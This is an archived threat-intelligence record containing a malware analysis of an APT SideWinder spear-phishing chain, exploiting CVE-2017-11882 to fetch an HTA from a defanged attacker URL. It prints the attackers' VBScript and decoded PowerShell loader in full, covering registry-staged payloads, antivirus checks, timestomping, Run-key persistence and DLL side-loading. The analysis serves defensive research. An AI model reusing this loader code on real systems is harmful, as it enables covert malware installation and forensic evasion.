{
	"id": "70041452-8673-48f2-bb33-d3690b5dc1b8",
	"created_at": "2026-04-06T00:08:07.795219Z",
	"updated_at": "2026-04-10T03:37:20.298451Z",
	"deleted_at": null,
	"sha1_hash": "26c00470bdfb728522161a5cf595371a5c1b43cc",
	"title": "APT Sidewinder: Tricks powershell, Anti Forensics and execution side loading",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 998796,
	"plain_text": "APT Sidewinder: Tricks powershell, Anti Forensics and execution side loading\r\nBy Sebdraven\r\nPublished: 2018-07-17 · Archived: 2026-04-05 16:52:24 UTC\r\nSpear phishing\r\nA few days ago I started analysing an RTF document, following on from my recent research.\r\nI found this sample: 892859ea9d86fc441b24222148db52eb33cd106c2ac68eafbe83ab0064215488\r\nRunning rtfobj on it reports two malformed embedded OLE objects, but rtfobj nevertheless extracts the two raw objects successfully.\r\nThe object 6A2A1 is the interesting one.\r\nThe OLE object is in fact an exploit for CVE-2017-11882.\r\nThe implementation is a bit different from the one in my last article: there is no MTF object.\r\nThe implementation has a lot in common with the public exploit: https://github.com/0x09AL/CVE-2017-11882-metasploit\r\nExploitation proceeds as follows: an HTA is downloaded from the URL below and launched via mshtml.dll's RunHTMLApplication.\r\ncaller.exe hxxp://www.google.com.d-dns.co/includes/686a0ea5/-1/1223/da897db0/final.hta\r\nhttps://medium.com/@Sebdraven/apt-sidewinder-tricks-powershell-anti-forensics-and-execution-side-loading-5bc1a7e7c84c\r\nPage 1 of 7\r\nThe HTA is a mix of PowerShell, VBScript and JavaScript.\r\nInstallation of payload and Persistence\r\nThe payload is installed by the VBScript at line 151:\r\nobjWSS.RegWrite \"HK\"\u0026\"CU\\Softwa\"\u0026\"re\\Updater\\pa\"\u0026\"rt3\", bnm, \"REG_SZ\"\r\nthen here:\r\ntst = getProfile(\"0\") \u0026 \"$c=\"\"\"\u0026c\u0026\"\"\";$m=\"\"\"\u0026m\u0026\"\"\";\"\u0026\r\nBase64Decode(objWSS.RegRead(\"HKEY_CURRENT_USER\\Softwa\"\u0026\"re\\Updater\\pa\"\u0026\"rt3\")) \u0026 getProfile(\"1\")\r\nobjWSS.run \"powershell.exe -ExecutionPolicy Bypass -Command \"\"\" \u0026 tst \u0026 \"\"\"\", 0, true\r\nand here:\r\nobjWSS.RegWrite \"HKCU\\Software\\Updater\", \"\"\r\nobjWSS.RegWrite \"HKCU\\Software\\Updater\\part1\", p1, \"REG_SZ\"\r\nobjWSS.RegWrite \"HKCU\\Software\\Updater\\part2\", p2, \"REG_SZ\"\r\nThe registry is used as a pivot: p1, p2 and bnm are three blobs of base64 data.\r\nbnm decoded is:\r\niex([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(\"\"\"U2V0LUV4ZWN1dGlvblBvbGljeSAtRXhlY3V0aW9uUG9s\r\nDecoding that inner base64 block in turn gives:\r\nSet-ExecutionPolicy -ExecutionPolicy Bypass -Scope CurrentUser -Force;\r\n$ErrorActionPreference='SilentlyContinue';\r\n$pname36 = \"3\" + \"60Tr\" + \"ay\"\r\n$binDir = [Environment]::GetFolderPath([Enum]::ToObject([System.Environment+SpecialFolder], 35))+ \"\\\" + \"Winset\\Config\" + \"\\\";\r\n$bin = \"Winset.exe\";\r\ntry{\r\n$cmdLine = ([int]$c).toString(\"00000000\")+([int]$m).toString(\"00000000\");\r\n$cmdLine = $bin+ \" \" +$cmdLine;\r\n}\r\ncatch{\r\n$cmdLine = $bin;\r\n}\r\n$line = new-object byte[] 64;\r\n$buf6 =[Byte[]] (,0x23 * 64);\r\n$cbytes = [system.Text.Encoding]::ASCII.GetBytes($cmdLine);\r\n[array]::copy($cbytes,$line,$cbytes.length);\r\n$binPath = $binDir + $bin;\r\n$binPathdll = $binDir + \"cmpbk32.dll\";\r\n$dmybinPath = $binDir + \"cmdl32.exe\";\r\n$rpcdllpath = $binDir + \"57146C96.dll\";\r\n$run = 'HKCU:Software\\Microsoft\\Windows\\CurrentVersion\\Run\\';\r\n$system = 'HKCU:Software\\Updater';\r\n$runExists = False;\r\n$pnameavr = \"av\" + \"gn\" + \"t\";\r\n$msvbvmdllpath = $env:WINDIR + \"\\system32\\msvbvm60.dll\"\r\n$cmdl32path = $env:WINDIR + \"\\system32\\cmdl32.exe\"\r\n$q36 = Get-Process $pname36 -ErrorAction SilentlyContinue;\r\nif($q36){\r\nexit\r\n}\r\nfunction dc($s){\r\nsal n New-Object;\r\n$data = [System.Convert]::FromBase64String(\"H4sIAAAAAAA\" + $s);\r\n$ms = n System.IO.MemoryStream;\r\n$ms.Write($data, 0, $data.Length);\r\n$ms.Seek(0,0) | Out-Null;\r\nreturn (n System.IO.StreamReader(n System.IO.Compression.GZipStream($ms, [System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd();\r\n};\r\nfunction updt($t, $b){\r\n(ls $t).LastWriteTime = (ls $b).LastWriteTime\r\n(ls $t).CreationTime = (ls $b).CreationTime\r\n(ls $t).LastAccessTime = (ls $b).LastAccessTime\r\n}\r\nfunction wb64($path, $b64){\r\n$bytes = [System.Convert]::FromBase64String(\"TVq\" + $b64);\r\nNew-Item -ItemType Directory -Force -Path $binDir | Out-Null;\r\n[io.file]::WriteAllBytes($path,$bytes) | Out-Null;\r\nupdt -t $path -b $cmdl32path\r\n}\r\nfunction sb($h, $n ) {\r\n$len = $n.length;\r\n$limit = $h.length - $len;\r\nFor( $i = 0; $i -le $limit; $i++ ) {\r\n$k = 0;\r\nFor( ; $k -lt $len; $k++ ) {\r\nif( $n[$k] -ne $h[$i+$k] ) {break};\r\n}\r\nif( $k -eq $len ){return $i};\r\n}\r\nreturn -1;\r\n}\r\nif((Test-Path $env:WINDIR\\SysWOW64)){\r\n$msvbvmdllpath = $env:WINDIR + \"\\SysWOW64\\msvbvm60.dll\"\r\n$cmdl32path = $env:WINDIR + \"\\SysWOW64\\cmdl32.exe\"\r\n}\r\ntry{\r\nif(!(Test-Path $binPath)){\r\n$b64 = dc -s ((Get-ItemProperty -Path $system).part1);\r\n$bytes = [System.Convert]::FromBase64String(\"TVq\" + $b64);\r\n$rn = [System.BitConverter]::GetBytes((Get-Random -Maximum 9999 -Minimum 1111))[0..1];\r\n[array]::copy($rn,0,$bytes,$bytes.length - 2,2);\r\nNew-Item -ItemType Directory -Force -Path $binDir | Out-Null;\r\n[io.file]::WriteAllBytes($binPath,$bytes) | Out-Null;\r\nupdt -t $binPath -b $cmdl32path\r\n$b64dll = dc -s ((Get-ItemProperty -Path $system).part2);\r\n$bytes = [System.Convert]::FromBase64String(\"TVq\" + $b64dll);\r\n[array]::copy($line,0,$bytes,(sb -h $bytes -n $buf6),64);\r\nNew-Item -ItemType Directory -Force -Path $binDir | Out-Null;\r\n[io.file]::WriteAllBytes($binPathdll,$bytes) | Out-Null;\r\nupdt -t $binPathdll -b $cmdl32path\r\n}\r\nRemove-Item -Path $system | Out-Null;\r\nRemove-Item $PROFILE.CurrentUserAllHosts | Out-Null;\r\nNew-ItemProperty -Path $run -Name \"Winsound\" -PropertyType String -Value $dmybinPath | Out-Null;\r\nCopy-Item $msvbvmdllpath $rpcdllpath\r\nupdt -t $rpcdllpath -b $msvbvmdllpath\r\nCopy-Item $cmdl32path $dmybinPath\r\nupdt -t $dmybinPath -b $cmdl32path\r\n$avr = Get-Process $pnameavr -ErrorAction SilentlyContinue\r\nif (!$avr) {\r\n\u0026($dmybinPath) | Out-Null;\r\n}\r\nExit\r\n}\r\ncatch {\r\n$_.Exception.Message | Out-Null;\r\n}\r\nThis PowerShell first checks whether the 360 antivirus is present (process 360Tray) and exits if it is:\r\n$pname36 = \"3\" + \"60Tr\" + \"ay\"\r\n$q36 = Get-Process $pname36 -ErrorAction SilentlyContinue;\r\nif($q36){\r\nexit\r\n}\r\nWe can assume the attackers carried out a reconnaissance step beforehand.\r\nThe folder that hosts the loading chain is:\r\n$binDir = [Environment]::GetFolderPath([Enum]::ToObject([System.Environment+SpecialFolder], 35))+ \"\\\" + \"Winset\\Config\" + \"\\\";\r\nThe PowerShell copies two legitimate Windows files into it:\r\n$msvbvmdllpath = $env:WINDIR + \"\\system32\\msvbvm60.dll\"\r\n$cmdl32path = $env:WINDIR + \"\\system32\\cmdl32.exe\"\r\nCopy-Item $cmdl32path $dmybinPath\r\nCopy-Item $msvbvmdllpath $rpcdllpath\r\nSo msvbvm60.dll becomes 57146C96.dll.\r\nWinset.exe and cmpbk32.dll are decoded and written to the same folder.\r\npart1 and part2 are values under the registry key $system = 'HKCU:Software\\Updater':\r\nobjWSS.RegWrite \"HKCU\\Software\\Updater\", \"\"\r\nobjWSS.RegWrite \"HKCU\\Software\\Updater\\part1\", p1, \"REG_SZ\"\r\nobjWSS.RegWrite \"HKCU\\Software\\Updater\\part2\", p2, \"REG_SZ\"\r\npart1 is a big blob of base64 data.\r\nFirst the registry value is retrieved:\r\n(Get-ItemProperty -Path $system).part1\r\nThen the function dc is called:\r\nfunction dc($s){\r\nsal n New-Object;\r\n$data = [System.Convert]::FromBase64String(\"H4sIAAAAAAA\" + $s);\r\n$ms = n System.IO.MemoryStream;\r\n$ms.Write($data, 0, $data.Length);\r\n$ms.Seek(0,0) | Out-Null;\r\nreturn (n System.IO.StreamReader(n System.IO.Compression.GZipStream($ms, [System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd();\r\n};\r\nThe string \"H4sIAAAAAAA\" (the base64 form of a gzip header) is prepended to the data read from the registry, and the result is base64-decoded:\r\n$data = [System.Convert]::FromBase64String(\"H4sIAAAAAAA\" + $s);\r\nand gunzipped:\r\n[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd();\r\n};\r\nThen the MZ header in base64 (\"TVq\") is prepended and the result decoded:\r\n$bytes = [System.Convert]::FromBase64String(\"TVq\" + $b64);\r\nThe executable is modified one last time (two random bytes are written at its end) and written to $binDir:\r\n$bytes = [System.Convert]::FromBase64String(\"TVq\" + $b64);\r\n$rn = [System.BitConverter]::GetBytes((Get-Random -Maximum 9999 -Minimum 1111))[0..1];\r\n[array]::copy($rn,0,$bytes,$bytes.length - 2,2);\r\nNew-Item -ItemType Directory -Force -Path $binDir | Out-Null;\r\n[io.file]::WriteAllBytes($binPath,$bytes) | Out-Null;\r\nThe DLL is decoded, modified and written to disk in the same way:\r\n$b64dll = dc -s ((Get-ItemProperty -Path $system).part2);\r\n$bytes = [System.Convert]::FromBase64String(\"TVq\" + $b64dll);\r\n[array]::copy($line,0,$bytes,(sb -h $bytes -n $buf6),64);\r\nNew-Item -ItemType Directory -Force -Path $binDir | Out-Null;\r\n[io.file]::WriteAllBytes($binPathdll,$bytes) | Out-Null;\r\nupdt -t $binPathdll -b $cmdl32path\r\nThe important trick here is the line [array]::copy($line,0,$bytes,(sb -h $bytes -n $buf6),64); which patches the DLL.\r\nIf you decode part2 without applying the modification, you get a truncated DLL.\r\nThe original post shows the disassembly before and after the patch.\r\nIn fact, the PowerShell patches the DLL to insert $line, which it builds as follows:\r\n$line = new-object byte[] 64;\r\n$buf6 =[Byte[]] (,0x23 * 64);\r\n$cbytes = [system.Text.Encoding]::ASCII.GetBytes($cmdLine);\r\n[array]::copy($cbytes,$line,$cbytes.length);\r\nwhere $cmdLine comes from:\r\n$bin = \"Winset.exe\";\r\n$cmdLine = ([int]$c).toString(\"00000000\")+([int]$m).toString(\"00000000\");\r\n$cmdLine = $bin+ \" \" +$cmdLine;\r\nwhich matches the string found in the patched DLL: .string \"Winset.exe -0000000100001223\"\r\nSo we end up with the following in the Winset\\Config folder:\r\nWinset.exe (part1, decoded and modified), a fake Windows Security Configuration Editor Command Tool\r\ncmpbk32.dll (part2, decoded and modified)\r\n57146C96.dll (the VB virtual machine, msvbvm60.dll)\r\ncmdl32.exe (legitimate Windows executable)\r\nThe PowerShell then changes the timestamps of the written files to match those of cmdl32.exe (timestomping):\r\nupdt -t $binPathdll -b $cmdl32path\r\nupdt -t $binPath -b $cmdl32path\r\nfunction updt($t, $b){\r\n(ls $t).LastWriteTime = (ls $b).LastWriteTime\r\n(ls $t).CreationTime = (ls $b).CreationTime\r\n(ls $t).LastAccessTime = (ls $b).LastAccessTime\r\n}\r\nPersistence\r\nPersistence is a very basic HKCU Run key, with $dmybinPath as its value:\r\n$run = 'HKCU:Software\\Microsoft\\Windows\\CurrentVersion\\Run\\';\r\nNew-ItemProperty -Path $run -Name \"Winsound\" -PropertyType String -Value $dmybinPath | Out-Null;\r\nThis reloads cmpbk32.dll at each reboot of the system and executes the DLL's DllMain.\r\nLoading Chain\r\nThe PowerShell launches cmdl32.exe (\"Connection Manager Phonebook Downloader\"), which AV trusts because it is developed by Microsoft.\r\nThis executable uses cmpbk32.dll, so when cmdl32.exe is launched, the cmpbk32.dll sitting in the same directory is loaded (side loading) and its entry point is executed.\r\nThe important part of the DLL is the function sub.Winset.exe__0000000100001223_0, which launches Winset.exe, the real RAT, like this: \"Winset.exe -0000000100001223\" ; len=2\r\nSource: https://medium.com/@Sebdraven/apt-sidewinder-tricks-powershell-anti-forensics-and-execution-side-loading-5bc1a7e7c84c",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"ETDA",
		"Malpedia"
	],
	"references": [
		"https://medium.com/@Sebdraven/apt-sidewinder-tricks-powershell-anti-forensics-and-execution-side-loading-5bc1a7e7c84c"
	],
	"report_names": [
		"apt-sidewinder-tricks-powershell-anti-forensics-and-execution-side-loading-5bc1a7e7c84c"
	],
	"threat_actors": [
		{
			"id": "d0c0a5ea-3066-42a5-846c-b13527f64a3e",
			"created_at": "2023-01-06T13:46:39.080551Z",
			"updated_at": "2026-04-10T02:00:03.206572Z",
			"deleted_at": null,
			"main_name": "RAZOR TIGER",
			"aliases": [
				"APT-C-17",
				"T-APT-04",
				"SideWinder"
			],
			"source_name": "MISPGALAXY:RAZOR TIGER",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "6b9fc913-06c6-4432-8c58-86a3ac614564",
			"created_at": "2022-10-25T16:07:24.185236Z",
			"updated_at": "2026-04-10T02:00:04.893541Z",
			"deleted_at": null,
			"main_name": "SideWinder",
			"aliases": [
				"APT-C-17",
				"APT-Q-39",
				"BabyElephant",
				"G0121",
				"GroupA21",
				"HN2",
				"Hardcore Nationalist",
				"Rattlesnake",
				"Razor Tiger",
				"SideWinder",
				"T-APT-04"
			],
			"source_name": "ETDA:SideWinder",
			"tools": [
				"BroStealer",
				"Capriccio RAT",
				"callCam"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "173f1641-36e3-4bce-9834-c5372468b4f7",
			"created_at": "2022-10-25T15:50:23.349637Z",
			"updated_at": "2026-04-10T02:00:05.3486Z",
			"deleted_at": null,
			"main_name": "Sidewinder",
			"aliases": [
				"Sidewinder",
				"T-APT-04"
			],
			"source_name": "MITRE:Sidewinder",
			"tools": [
				"Koadic"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434087,
	"ts_updated_at": 1775792240,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/26c00470bdfb728522161a5cf595371a5c1b43cc.pdf",
		"text": "https://archive.orkl.eu/26c00470bdfb728522161a5cf595371a5c1b43cc.txt",
		"img": "https://archive.orkl.eu/26c00470bdfb728522161a5cf595371a5c1b43cc.jpg"
	}
}